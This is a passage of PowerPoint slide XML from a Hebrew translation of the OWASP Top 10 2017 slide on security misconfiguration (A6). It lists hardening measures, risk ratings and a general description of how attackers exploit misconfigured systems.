              <a:t>תהליך הקשחה מחזורי אשר מאפשר במהירות ובקלות לפרוס סביבה חדשה כשהיא מוקשחת כהלכה. סביבות פיתוח, בדיקות וייצור צריכות להיות מוגדרות בצורה זהה, תוך שימוש בנתוני הזדהות שונים לכל סביבה. תהליך זה צריך להיות ממוכן על-מנת לצמצם את המאמץ הנדרש להתקנת סביבה חדשה בצורה מאובטחת</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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פלטפורמה מינימאלית ללא יכולות מיותרות, מרכיבים, תיעוד ודוגמאות. הסר או הימנע מהתקנת יכולות או מסגרות מיותרות.</a:t>
            </a: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משימה לבחינה ועדכון הגדרות בצורה נאותה בהתאם להנחיות האבטחה, עדכוני תוכנה ואבטחה כחלק מתהליך העדכונים השוטף </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(ראה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>שימוש ברכיבים עם פגיעויות ידועות - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>). בייחוד, בחן הרשאות שירותי אחסון בענן (לדוגמה הרשאות ל-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S3 buckets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a: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ארכיטקטורת יישום שעברה סגמנטציה המאפשרת הפרדה מאובטחת ויעילה בין רכיבי המערכת או ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tenants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, עם הפרדה, מידור או שימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cloud security groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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שליחת הנחיות אבטחה ל-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>clients</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> דוגמת שימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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תהליך ממוכן לווידוא יעילות ההגדרות בכלל הסביבות.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>  ניהול </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>תצורה לא מאובטח</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2050713982"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת ניצול: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> גילוי: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תוקפים לרוב ינסו לנצל</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> חולשות לא מעודכנות או גישה לחשבונות ברירת מחדל, עמודים שאינם בשימוש, קבצים או תיקיות בלתי מוגנות ועוד, על-מנת לגשת בצורה בלתי מורשית או ללא ידיעת המערכת.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ניהול</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> תצורה לא מאובטח עשוי לקרות בכל שלב ביישום, לרבות שירותי רשת, פלטפורמה, שרת ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, שרת האפליקציה, בסיס הנתונים, מסגרות עבודה, קוד וכן מכונות וירטואליות שהותקנו מראש, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>containers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> או מערך האחסון.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>סורקים ממוכנים יעילים לגילוי תצורה לא מאובטחת, שירותים בלתי נדרשים, יכולות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>legacy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, ועוד.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
